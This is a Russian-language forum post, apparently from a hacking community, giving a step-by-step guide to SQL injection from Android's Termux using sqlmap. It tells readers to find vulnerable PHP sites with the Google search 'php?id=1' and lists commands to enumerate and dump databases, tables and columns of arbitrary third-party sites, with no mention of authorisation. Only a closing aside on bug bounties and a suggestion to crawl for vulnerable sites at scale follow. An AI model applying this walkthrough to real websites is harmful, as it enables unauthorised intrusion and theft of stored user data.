advertising advertising advertising advertising advertising advertising advertising advertising advertising advertising

Проводим SQL-инъекцию из под Termux

BlackPope

Местный
Регистрация
27.04.2020
Сообщения
242
Реакции
34
Всем привет! Сегодня мы поговорим про то, что такое SQL-инъекция и как провести эту атаку на сайт с помощью Termux. Для этого мы будет использовать утилиту SQLmap.

Установка
apt update -y && apt upgrade -y && apt install python2 git -y
Находим уязвимый сайт

Подобного рода уязвимости остались на морально устаревших сайтах написанных на морально устаревшем ЯПе — PHP. Их очень легко найти, если вбить в Google "php?id=1".



Вот пример уязвимого сайта:



Запуск
python2 sqlmap.py -u <url уязвимого веб-сайта> --dbs
А вот и базы данных:


python2 sqlmap.py -u <url уязвимого веб-сайта> -D <база данных> -tables
Смотрим все таблицы в этой БД:


python2 sqlmap.py -u <url уязвимого веб-сайта> -D <база данных> -T <таблица> -С <колонка> --dump
Делаем дамп определенной колонки в таблице:



Как посмотреть дамп?


cd "название папки"
cat "название файла"
Резюмируя

Эту статью ни в коем случае нельзя назвать исчерпывающим материалом по теме SQL-инъекций.

Если вы хотите глубже погрузиться в тему SQL-инъекций, то вот пару статей с хабра:

И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках

Методы обхода защитных средств веб-приложений при эксплуатации SQL-инъекций

Если интересно больше узнать про SQLmap (Оф. статья с гитхаба на Eng):

https://github.com/sqlmapproject/sqlmap/wiki/Introduction

Про White Hat хакеров

Многие сайты, несмотря на огромное распространение этой проблемы, все еще имеют подобные уязвимости, а потому это все-еще хороший шанс заработать, ибо за нахождение подобных дыр платят нормальные деньги. Просто откройте Google и почитайте про "Bug Bounty".

НО! Искать эти уязвимости на каждом сайте по-отдельности — это дело максимально неблагодарное. Для этого зачастую пишутся веб-краулеры, которые бегают по интернету и ищут уязвимости.

Termux - one 🤍
 
Верх